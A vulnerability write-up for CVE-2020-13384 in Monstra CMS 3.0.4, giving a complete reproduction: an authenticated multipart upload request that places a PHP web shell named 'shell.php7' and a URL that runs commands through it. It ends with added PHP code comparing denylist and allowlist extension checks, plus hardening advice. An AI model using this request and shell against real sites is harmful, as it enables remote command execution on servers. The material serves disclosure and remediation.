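(CVE-2020-13384) Monstra CMS 3.0.4 Arbitrary File Upload Vulnerability

1. Vulnerability Overview

Monstra CMS is a lightweight, PHP-based content management system (CMS) by the Ukrainian software developer Sergey Romanenko. The index.php script in Monstra CMS 3.0.4 contains a security vulnerability caused by the program not correctly validating file extensions. A remote attacker can exploit it with a specially crafted HTTP request to upload and execute arbitrary PHP code.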

2. Affected Versions

Monstra CMS 3.0.4

3. Reproduction Steps

Visit https://www.0-sec.org/monstra/admin/index.php?id=filesmanager&path=uploads/

POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: www.0-sec.org
Content-Length: 548
Cache-Control: max-age=0
Origin: https://www.0-sec.org
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.0-sec.org/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close

------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"

2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>


------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"

Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--

https://www.0-sec.org/monstra/public/uploads/shell.php7?cmd=id
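
The root cause named in section 1, an extension check that lets a .php7 file through, shown here as an added example that is not Monstra's own code: a denylist check beside an allowlist check, run over constructed filenames. The function names and both extension lists are assumptions made for illustration.

```php
<?php
// Added example, not Monstra's code: function names and both lists are assumptions.

// Weak pattern: a denylist blocks only the extensions someone remembered to list.
const DENIED_EXTENSIONS = ['php', 'phtml', 'php3', 'php4', 'php5', 'phps'];

function denylist_allows(string $filename): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, DENIED_EXTENSIONS, true);
}

// Hardened pattern: allowlist of the types the site needs (assumed policy).
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

function allowlist_allows(string $filename): bool
{
    // One base name and exactly one extension: rejects path separators,
    // dotfiles such as ".htaccess", and double extensions such as "a.php.jpg".
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})\z/', $filename, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), ALLOWED_EXTENSIONS, true);
}

// Store under a server-generated name so the client never chooses the path.
function stored_name(string $filename): ?string
{
    if (!allowlist_allows($filename)) {
        return null;
    }
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample filenames, including the one from the request above.
foreach (['shell.php7', 'photo.JPG', '.htaccess', 'a.php.jpg', '../x.png'] as $name) {
    printf(
        "%-12s denylist=%-6s allowlist=%-6s stored=%s\n",
        $name,
        denylist_allows($name) ? 'accept' : 'reject',
        allowlist_allows($name) ? 'accept' : 'reject',
        stored_name($name) ?? '-'
    );
}
```

Extension checks are one layer; the upload directory should also be configured so the web server does not hand its files to the PHP interpreter.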